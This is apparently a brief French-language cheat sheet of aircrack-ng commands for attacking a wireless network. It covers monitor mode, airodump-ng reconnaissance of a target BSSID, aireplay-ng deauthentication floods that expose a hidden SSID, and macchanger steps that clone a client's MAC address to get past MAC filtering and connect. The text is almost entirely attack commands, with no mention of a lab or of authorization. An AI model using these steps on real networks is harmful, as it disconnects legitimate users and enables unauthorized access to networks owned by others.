
1- monitor on

2- Reperer BSSID
$ sudo airodump-ng wlan0mon
$ sudo airodump-ng --bssid <BSSID> -c X wlan0mon
>>> pont d'acces e <length:: X>

3- Lancer deauth
$ sudo aireplay-ng -0 5 -a <BSSID> wlan0mon 
>>> le nom du point d'accès s'affiche dans le airodump-ng

4- monitor on
>>> connexion

>@
>@#############################################
>@
>@* monitor on
>@
>@* Affiche point d'accès invisible
>@$ sudo macchanger -s wlan0
>@
>@* airodump-ng
>@$ sudo airodump-ng --bssid <BSSID> -c X wlan0mon
>@
>@* Deauth
>@$ sudo aireplay-ng -0 5 -a <BSSID> wlan0mon
>@
>@* Nom du point d'acces dans le airodump
>@$ sudo macchanger -m <MAC> wlan0
>@ 
>@* monitor off
>@
>@* Connexion
>@
>@#############################################
>@

